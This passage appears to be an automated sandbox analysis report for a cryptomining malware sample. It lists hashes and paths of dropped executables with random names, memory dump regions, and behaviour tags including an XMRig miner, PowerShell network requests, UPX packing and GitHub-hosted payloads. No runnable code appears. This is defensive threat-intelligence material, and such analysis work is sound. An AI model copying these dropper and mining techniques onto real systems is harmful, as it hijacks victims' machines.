SHA1 9b1800903518faf39ca26ba6cbfc4cf5b4c479d2
SHA256 f83e0ba38891e0716b0fec70c49b32eb54667d73dcdaccd7816200b1523040b1
SHA512 e389a2d70ea430f84e8119e6799fa7bf3117989354b664893e20b095e8f5090149fbc85416026df70ddd24fa267308864d9f86b132da21c61029c157f752309a

memory/2116-7-0x000000013FB20000-0x000000013FF12000-memory.dmp

memory/2928-9-0x000000013FB20000-0x000000013FF12000-memory.dmp

C:\Windows\system\vFRtkAQ.exe

MD5 201a5e06c8fb14a9865605ba11bd16c1
SHA1 2b8f1c7fa4dfb3efeb107841991957cc81f31494
SHA256 2c7c1f7504debd5b0dad0773761384eed2653fe874b7c991da86f61cfae61bff
SHA512 9f8ef0ccb1150f1d6553a296c9bab61117c1eb15cd88b6cf1a7699534e8a517c7209f2b7fb18b6e177ea8c0b83d2354b4814ae55d8b6298efee8c2d9594cdf4c

\Windows\system\ZdCqpFX.exe

MD5 7d60ef4e79c9ba5fd5a44b398a5eb2dd
SHA1 e8a235df79286968cbe41d0801d7a5462b8e69f2
SHA256 2fa95e39fbfbae30fcec2419a67324f3403c14d1d4008f8a71c4988554cef094
SHA512 6d08259673a24a49c610ea4a815460011f126322c8cf0243712c627c1b749f052ea9337f9d5a28f8907dde1209200c09001999eb5ddf850acbb43973830fc5fe

\Windows\system\WCqxFNE.exe

MD5 10b96f50395e8972138ff375b2370c27
SHA1 f82216d73ae7b05afeff43f770ddf60bc37804d6
SHA256 04356018165831c6e9865172b935ace1149d74538165863fa2afca4e09975117
SHA512 a1eb73bbdb93c035b1ab041ade148a937476918ff4bc9c858797cde62805f61c4e6f474c3c1c5a8b6d04272598d38ac081aa153d96d3687cc9cd6625868789e0

\Windows\system\gasevNe.exe

MD5 e44cc71b931536d6d571e1319811edb3
SHA1 c80f8091b073cdf76eb83bb3d66deb32ac7925c9
SHA256 92a6bcec5dc6c6c2554e4d70fa1c66215b4b210e7b0e10324c3be28c940bff97
SHA512 fb6359d53d47deec93b202b6e36acea49ca252063d5758ced30fed0eef56155f7f1c084708598b08063abb76f86d696c8136789827a213a8f5c006057aefe5ee

memory/2116-58-0x000000013F310000-0x000000013F702000-memory.dmp

C:\Windows\system\yeBqqJg.exe

MD5 8d01ff65e3f38c2649f273e394c038e9
SHA1 8278d2e41460f496217f62ac6d8f24680fb25e21
SHA256 bed1e6fc8bcbb76cd0fc4da5fbd9f62a509bee16e15cc46ce593232684972f3a
SHA512 755fc47d293b43bc4bbd63ca6612ccb69ddf9a8b9c16b7400718897441c07755a2afe8a478896089e0e526d625c93df1603f52e2891b8862e714a43f8114c589

\Windows\system\MTvukea.exe

MD5 f0358b0584d23a8e8580f6342acdac7c
SHA1 02f03b66d41c3ed812b21b3ac9f152915a05130a
SHA256 001937dab437f51313cbd1bc3a3646517ef8f5d9cd35751ba06245fd8b07713a
SHA512 1ceb577109e9328a15f7a1d4c5cebbf8413f0feaab0f98e0ca9a9995d435c264bc900ff909f6072166aabe68f12cda9f28dcdb2140b9dd517ed124a4826132fe

C:\Windows\system\WknOtpv.exe

MD5 c3cb9d22b14e407c9a0f70913414a34f
SHA1 cd17504e19236972825852be75a45538a832f9f5
SHA256 478163e322fbe44fa4a30f51f395f52c85ac47aa421e37139422d96f5248efa4
SHA512 8662c3dad769c9263d747a9b45da92230146b087f44f945a2fc835f128a0fdac82984591f9d792681e5dc37457d0ae467ed81d4631c52958b69c74ab337f9f3e

C:\Windows\system\QugnbdK.exe

MD5 c318f4eeb8f92845fdd1cc60378c808b
SHA1 69aea4c78bcd6967109a67544e757031b3a92d51
SHA256 7de76f4dd6ede6b50ae58790b297267fde01faa4f57c176d217b39e4a4fe8332
SHA512 ac573c02a99473a1901e7e4a15cc78fd3ce6b975de1ea2058d14bd3ec2bd82454abe1d1a2f5acf305f7a91ef235e77060f1a8dfe62ecbd1af55c0c8f610415ba

C:\Windows\system\UskBwYd.exe

MD5 9495daf30bffa9a8cbd05aa6ac656d76
SHA1 4c0e82301bb4acae78d9351565e4b1ca2d3233c0
SHA256 2e5a0d3faec469cd7c1177654623246b7082c9191ba149d3dffd0f41fc175033
SHA512 81254afb3b41e2a2b1f8572cd003e5976e0f375ae5fe095995282e7c516da92273c6e010e38cd44da488db68f94cb38ee52d118be1a2a8aa91afa1d49c11f4e5

memory/2724-19-0x000000013FF40000-0x0000000140332000-memory.dmp

C:\Windows\system\VPiKJII.exe

MD5 a7176fafc7b1f9ba205f53da3b78f02d
SHA1 35a9aa7275467dc4612c4fab048eeb75e4996dff
SHA256 b02fc152a67ba1e1de32364e7db8295f5f653fdb4e8383da009abc573a954145
SHA512 a85e36152c28a93e37277953687c72d2bbebd630f8d3b82b69bba88c3cc00863ba552416fa40dd8907f5a5ea313f1495d26b4d3911dbe18430f98215f783c954

C:\Windows\system\fPnZkqs.exe

MD5 5fef0a9d392c2129e6375d4f2a8a6d05
SHA1 eba2e77c83714f388af8a2d19fa3f56bf8e97bee
SHA256 e79bb6e8ded212717a1a334371c92233c28007dd4465e117aa936f3aa77be024
SHA512 38a4ff1bfea20767e6f32f57b1af36d7e319c499daa8b8d0aa77a1d35769ac04abec49ccf0889d8dec9e5d4fa08cce0e93bfedfbf565ae7edbad1e21c2aab337

C:\Windows\system\eIngqdw.exe

MD5 19296c5e91356e182d4aee35c51ea433
SHA1 01cf5196e9fd63a0c240565f1a5e8d1bb83abd19
SHA256 5b944176bc07d82a42fcc4dda67cf0362e54eef4de6156ddf34a09fd3ee02f81
SHA512 80d39beac351144f46ab0cf0517834c092cded17c50a337fd7adcc3feee7ca65d5de35a21014c75b84ea540e2b70cffd01d70efcb02cd09c5eeadfcae818aae1

C:\Windows\system\IHZsPtM.exe

MD5 7e8f13f93ad55a2e99d3719a759e84c7
SHA1 e23678a15839e41abf7d49f1cd95cbec3b7140c1
SHA256 9aa0ccb8bd6dfe33cbd7b011eb3e83725f91db61266a9413d3bae0722da56c3d
SHA512 fca848af83b44029fa5fd795613d9912e63bb300df3577536e7473c53dbe056d98b70ae530a90f47d84ed0e0156b4aa74c1bcb487ca0c80a8bb88f0eae05f936

memory/2472-315-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/2472-314-0x000000001B670000-0x000000001B952000-memory.dmp

memory/2116-359-0x000000013FF90000-0x0000000140382000-memory.dmp

\Windows\system\iuklPHn.exe

MD5 f5ab486d3b762c79643fdab261543644
SHA1 999c5173d2af3fe0dec720881a1164b9941a1372
SHA256 69d06dda834dd0cfabce3b1991f9fc9a69d8f9ad18c4594956e1f183005da70a
SHA512 021eb4a8dba5ea9fd237351609235abb2a05f8f53890bdad27a74698e229351b85b86566854dee2acc2734a542dfad9de99556ece6d832d3f6fc8f90036d7ff6

\Windows\system\ePqiZpt.exe

MD5 98cb419139b67524885cffb32f6fe778
SHA1 fe2baac970e8035cb27c879043f3973386362e2b
SHA256 a865517c5c4127e850eb64b3ad41b5b74cd7734332dce17aecf54cc169346c6e
SHA512 7d1ed5f3c425f35e8e18d0f982cfcbf561915fd4d65144575f8a0c7ef3d5d0910d72e21224f4846a5775c2080310956d67f4d6023689361c604e00e690b4fadd

C:\Windows\system\bYOkDGE.exe

MD5 2148ae144fd1f7a38d5fd7605a390a65
SHA1 b36b1c00acadb9f5c792461d6df266af21e81416
SHA256 0a4cf103ef29e84dbe88677dc6d7df8eebfdf066ec0433abb884ae4a8cd7cfb0
SHA512 021cbe53da9ac8967b196517bd45fac590d7c5a26b93033001011626820084ec77c289ff21f87d0ba4ecc9b5572d1df7e85df2a584dbe7e82b4412df824f7e70

C:\Windows\system\qcrXDsh.exe

MD5 288f81b26ac0c30becfdc56e0bd90bd5
SHA1 9e5deddaffca4d6db355b80c5f6ab0213c5b0db2
SHA256 e40f3a3740a23f100f0166768c0e8831291658e022cfa8f7b4b447d9dbedf595
SHA512 593cf65097dd69d7064d7621126188845ddcf836cd3ac9198366b03618ae6bf6946898a5309c783769d3b2ab30c6707f84e68652612163219c13b7731cab02dc

C:\Windows\system\bZrkSyf.exe

MD5 9ff76ef8e4e28771018f33b5688b190d
SHA1 f872360996a0dcd4df79ef1bf8dc5f9f7b0da537
SHA256 3de7cc524f771e1c63b4887eae6acbd6a31de0210f51c28645a256cd7d162cf7
SHA512 1b94de9dafc427e0a606429e2bef420698b885c4b6aa138ede0617322e61ae9e75b583c09cf08d8c6fe39723e13fdf62397fd0fa16401d3d3b3171200c287bc9

C:\Windows\system\VqsQAdN.exe

MD5 1ad3ede98605dba0f28ca4c985b85f7b
SHA1 85d3d090417759c28761267c0904871f91499607
SHA256 4a2ded239d4c1fd567f3e59a0cb5e843d1255f5dad44f7d7b417ebb96969aa3a
SHA512 91eba53707fe004705b80fa3ea757cdd7559160293ea0af6d3f434ba0af51d0f5472f06337b349d5a16b788194dfe39bcba9b55dfc6501910b8ccef73b0e1bcd

C:\Windows\system\wSZfHtv.exe

MD5 ee780d2bb1a36f4a84f7a2774d7b7ce7
SHA1 b091e8b3ec31a6054d74edce5f7204de4acc41b1
SHA256 70f725d1a86f6f3444c811c7fabf15ec4c6ffb0e297e2421f3e4058f1e8aeb1b
SHA512 e88d93454dbb946df42c967944fcf923799e76a69325c5e58037f9ae386db4f561faecbfc0d613b1b4997301539f356cac3b5cd8f695e9a4bd53cf6773c3f6eb

C:\Windows\system\fMFcFUO.exe

MD5 48f94c96e9b5927f44ad4e184e070e9e
SHA1 f707cd78cc008d1442607aa8eeb1786b628abd3e
SHA256 6f0c592fa95e051a9ec488715108f62b0d86cf37ceaf13d885f6617e03d32ff1
SHA512 448ff03a0e22caa341fcc44ab557d14a1ed56208c5d2434ff227c2ed5c53a8bf7cb03972acae0a7c2fdbe9ef472038eefe6134abb57f0668ff47c71db0efd4fc

C:\Windows\system\wsaXEOQ.exe

MD5 9793e9db56e7def971fac40bb56f29e3
SHA1 49cbeba919cff0754712ba56fbff72136fec982b
SHA256 1ed6477847ff51e9e33948f40d23ff69c8419527561c58c6c14fb13d622654f8
SHA512 ceb2d8bcad7de4ac4830ed0a96fd357a1d77a776fae78b9c3237c1670d081645c2117cde9ba573f1a89d744f5351e38f58c60cbddd8fa38fd46641880a3dfab4

C:\Windows\system\FAtsXen.exe

MD5 ba82e4d1d28566e428b0c9eafa9c25df
SHA1 8c308df9e6c627ab9b9cad702dfef51a1f443838
SHA256 ede148a3b4dacd52cfdd6578dea85cb625687bb709ec4ba4723586b144ecfcef
SHA512 3c5e120b1f5dc7ade5b37cec1c6326a601fce45138dbcb1dae573f94a67614895c0b378ead0f703c2b998f26238387878698f98d7f2d2d3e22245d39c5c2be8e

C:\Windows\system\HIzPyZx.exe

MD5 5a6998f6164975038c4c706ae76ba26d
SHA1 9a6c7d973a360847a342943acc7d6ae1975ef737
SHA256 11191930e407027b3672ee9e7d5bab19565e7728bdb2a23823f44d39e8ad6e02
SHA512 679a23eb4577959be8f3539b13d58bc5bb2bcd50467dc918e283c6185f0d1be93c62e641eef1f00d998a92b70a150ed0b707b4b6170ee31019a041910b03472a

C:\Windows\system\MfNMjXX.exe

MD5 de6252e1341469fd5a49d509c23ceb45
SHA1 db9168950b19ecf17f904d3ecf3a6eb39b13fb53
SHA256 48093907f8e020d2e5c8f1d661678bed66b245ec7053f136015f4a30f258bfad
SHA512 ef70bfad06666f2966048e3e28c49d49956c0f1b765752de463e5ca9dda0f93b2092c0c513f9e6d073d29e701a575be3e4a818c23aced2edda2b109dae403020

C:\Windows\system\dSUDnPU.exe

MD5 4c094a5c6b106ed11e82ee25f644b36e
SHA1 15efc6b2d22387082bd7985814cf45fd8d4b7c42
SHA256 d8824dba3e61b54ae066ffa8628973e7d4209926edd770977e5448a12adf5d0d
SHA512 138751c83c9acda52291c0d7fc675712b065fc011c4b9ce616f484566eae2552a733de0efcd50386d52e25e0f221d62a274dfa396ae3fec361610f9a3b3b0525

C:\Windows\system\qlQHsUV.exe

MD5 6fe08b05f9ccd94b35ffad1575e7919d
SHA1 06730057e4a8837da7b0bfd3d77fe0ab77f499b7
SHA256 4b51ccb85da484227e648d5f65362f8fb1018c674d130a4337ab1f50eb7824e3
SHA512 52bef15ba21d5da5e06d8db429484988a1080b29de38287a7b4baef00484f521b4c838a19497b019b3a53be8ca118bce36744d8f1807e7edb6d76109f054936e

C:\Windows\system\QVyWXtI.exe

MD5 f010f9766e511c3e47f34b8cabebef55
SHA1 fe7ec04608960d147786e61bcbc4c9c8de9b8360
SHA256 caf0bff355cfd59f4de69947ae3d2bfa0d87db5815c96161b47bb167c23e9a2f
SHA512 b030ae41f3d1d4d2bc3f2166f7fbf89a5fab429ec66e95566b6cc4f19fabf35c66a0cd74a3905d110f7e0acaf35025126246400bcaee65b485e9269292c37087

memory/2028-76-0x000000013F3F0000-0x000000013F7E2000-memory.dmp

memory/2116-75-0x000000013F660000-0x000000013FA52000-memory.dmp

memory/2116-74-0x000000013F9F0000-0x000000013FDE2000-memory.dmp

memory/2116-73-0x00000000035F0000-0x00000000039E2000-memory.dmp

memory/3028-72-0x000000013FEC0000-0x00000001402B2000-memory.dmp

memory/2516-71-0x000000013FE90000-0x0000000140282000-memory.dmp

memory/2740-62-0x000000013F4E0000-0x000000013F8D2000-memory.dmp

memory/2116-53-0x00000000035F0000-0x00000000039E2000-memory.dmp

memory/2616-43-0x000000013FED0000-0x00000001402C2000-memory.dmp

\Windows\system\nGOyGaI.exe

MD5 de62ca46884808b7594ca0625cef15aa
SHA1 e143f61b83316f4fffcf314c4c944097a4fa1f60
SHA256 be99986ba397f3b99e90050bf100a398492e2aff2d6fb89e06999f2bcaa9381b
SHA512 52b49c415f72c7b6273db81b306c495a93856f13ec1315c9d0e476db557e4dbde91f61518cd1a690153fbfc2a57c22ecd7431d533cdcf7948967ab69f5e0c261

memory/2116-33-0x000000013F4E0000-0x000000013F8D2000-memory.dmp

memory/2116-29-0x0000000002FF0000-0x00000000033E2000-memory.dmp

C:\Windows\system\QGSMriC.exe

MD5 5bb9a0dc21fa8fb6b35ab753b0fa779c
SHA1 bdc3b777ed13b4ecc9bf97927313df2840e1e15c
SHA256 ba3cd563affc64c231e4ef87c2a02ab8a99669faf1ce61416b0fba629e87736c
SHA512 b350b342e6b0c1a1baad63b0dd133b2f21c640fc6e6356733c9245db3b7783e8dddde5a6415a0d5252295f6a6c3fb0edf6bf45967ea470fee65c8b5528735f99

C:\Windows\system\xSyyvLF.exe

MD5 7fdfd7278aadbc6bb82a1f357695d9b9
SHA1 abd385632ec7ef2a8fc41bcfac09420fc6bc5d56
SHA256 4592af222341db71bf9160cc823004099ae019883b2a23dc4da459424397cc07
SHA512 dcbc5c1de840d0132a8b222855d8690eb76d4fdfbd37e326e580f4a27757d09fa408d553bfd5f7c62418f4a8042c4dd98f84072a3fb2e6646608bca15feb6d7a

C:\Windows\system\gFxIXFW.exe

MD5 9802e22bf29d12ae091a55c13858750f
SHA1 4504533d3fe643fc2be1aea826a755a3a2b47b90
SHA256 bb5955083baf61c278d39bec93a76551b1d2944cb45bd4b7410cdf9017abb520
SHA512 23bf5369d1f2a3801b5f10bd59e1bbb440926d7df813a7ad4ff8516b3da818e5336733529517574b15dcb93fd75996c7680a9a2ba47d99dd5cb9da76a62d105a

memory/2540-49-0x000000013F7F0000-0x000000013FBE2000-memory.dmp

memory/2116-46-0x000000013F200000-0x000000013F5F2000-memory.dmp

memory/2660-45-0x000000013F310000-0x000000013F702000-memory.dmp

memory/2928-4973-0x000000013FB20000-0x000000013FF12000-memory.dmp

memory/2028-4983-0x000000013F3F0000-0x000000013F7E2000-memory.dmp

memory/2616-4992-0x000000013FED0000-0x00000001402C2000-memory.dmp

memory/2740-4991-0x000000013F4E0000-0x000000013F8D2000-memory.dmp

memory/2540-5036-0x000000013F7F0000-0x000000013FBE2000-memory.dmp

memory/2516-5035-0x000000013FE90000-0x0000000140282000-memory.dmp

memory/2660-5069-0x000000013F310000-0x000000013F702000-memory.dmp

memory/3028-5943-0x000000013FEC0000-0x00000001402B2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 14:12

Reported

2024-05-25 14:58

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\RzQbsUy.exe N/A
N/A N/A C:\Windows\System\Jvoylpo.exe N/A
N/A N/A C:\Windows\System\oMLDXpY.exe N/A
N/A N/A C:\Windows\System\fpfJhZN.exe N/A
N/A N/A C:\Windows\System\bZYeUPE.exe N/A
N/A N/A C:\Windows\System\hWUnCgR.exe N/A
N/A N/A C:\Windows\System\rHHLJfh.exe N/A
N/A N/A C:\Windows\System\bQGmqDs.exe N/A
N/A N/A C:\Windows\System\RjsacaJ.exe N/A
N/A N/A C:\Windows\System\KLcVAHy.exe N/A
N/A N/A C:\Windows\System\mATRJEd.exe N/A
N/A N/A C:\Windows\System\VigWBwe.exe N/A
N/A N/A C:\Windows\System\zRORSfh.exe N/A
N/A N/A C:\Windows\System\KyYyQCe.exe N/A
N/A N/A C:\Windows\System\yUpMrha.exe N/A
N/A N/A C:\Windows\System\LGdkhVO.exe N/A
N/A N/A C:\Windows\System\XSTWMcU.exe N/A
N/A N/A C:\Windows\System\lVErAaq.exe N/A
N/A N/A C:\Windows\System\TQwLsYt.exe N/A
N/A N/A C:\Windows\System\lFIifHV.exe N/A
N/A N/A C:\Windows\System\dzgoZLU.exe N/A
N/A N/A C:\Windows\System\hlHUBLi.exe N/A
N/A N/A C:\Windows\System\xbBXeac.exe N/A
N/A N/A C:\Windows\System\JYIkKUo.exe N/A
N/A N/A C:\Windows\System\gGhCRUh.exe N/A
N/A N/A C:\Windows\System\xXhBCyi.exe N/A
N/A N/A C:\Windows\System\yEgAAJb.exe N/A
N/A N/A C:\Windows\System\vkFfbig.exe N/A
N/A N/A C:\Windows\System\HWyoeMX.exe N/A
N/A N/A C:\Windows\System\rKNkxMb.exe N/A
N/A N/A C:\Windows\System\KRXBWIS.exe N/A
N/A N/A C:\Windows\System\dQTxAmp.exe N/A
N/A N/A C:\Windows\System\XISNVfW.exe N/A
N/A N/A C:\Windows\System\tGpImCo.exe N/A
N/A N/A C:\Windows\System\WndMRtP.exe N/A
N/A N/A C:\Windows\System\fUcktTn.exe N/A
N/A N/A C:\Windows\System\qnmuzFq.exe N/A
N/A N/A C:\Windows\System\BuXqwac.exe N/A
N/A N/A C:\Windows\System\lIcyPFQ.exe N/A
N/A N/A C:\Windows\System\UTmuzpr.exe N/A
N/A N/A C:\Windows\System\OmTDpRE.exe N/A
N/A N/A C:\Windows\System\bGArIyN.exe N/A
N/A N/A C:\Windows\System\CtPDPQP.exe N/A
N/A N/A C:\Windows\System\taNgYWk.exe N/A
N/A N/A C:\Windows\System\FrUKlBi.exe N/A
N/A N/A C:\Windows\System\jcQHwWq.exe N/A
N/A N/A C:\Windows\System\BZFkXMN.exe N/A
N/A N/A C:\Windows\System\fDkedUc.exe N/A
N/A N/A C:\Windows\System\eVcmRwf.exe N/A
N/A N/A C:\Windows\System\uyDhrzn.exe N/A
N/A N/A C:\Windows\System\suZCcVU.exe N/A
N/A N/A C:\Windows\System\TNrTAEL.exe N/A
N/A N/A C:\Windows\System\JJzWesS.exe N/A
N/A N/A C:\Windows\System\TYTcrVH.exe N/A
N/A N/A C:\Windows\System\zjbhmFQ.exe N/A
N/A N/A C:\Windows\System\mSSgNDF.exe N/A
N/A N/A C:\Windows\System\XDKCmZn.exe N/A
N/A N/A C:\Windows\System\KlYXJCI.exe N/A
N/A N/A C:\Windows\System\uwbGlyo.exe N/A
N/A N/A C:\Windows\System\tTFhKTo.exe N/A
N/A N/A C:\Windows\System\AFvGUVy.exe N/A
N/A N/A C:\Windows\System\PsWjfqX.exe N/A
N/A N/A C:\Windows\System\rqdqObP.exe N/A
N/A N/A C:\Windows\System\OhObzmn.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\xKMlKXS.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zCEsZTF.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WoUcWhr.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DIkAZvP.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MbzVXeC.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qolWfxo.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XdRrMnU.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NpLAjJl.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lpwDuro.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PinKeeY.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\otLRErC.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\trplrIG.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AaaanxO.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BTrqdEG.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OjZgyxv.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ltnMijk.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HOpTKeH.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uXhqKLl.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RvWduxG.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YesqeHH.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LQVcIQH.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gPPSlGn.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BElwJRC.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hdQrBZK.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kQdgULj.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NIrTTcx.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VwVQWrR.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dhWKTDd.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ibtsDkw.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vwcHsIU.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MtvZynO.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xQWbMco.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZYwGTtH.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JoAALlH.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dbtLZUR.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GKHiwsa.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\btWvGtz.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pxAWbMp.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\czBTNPx.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XbukmQR.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fejYnpZ.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
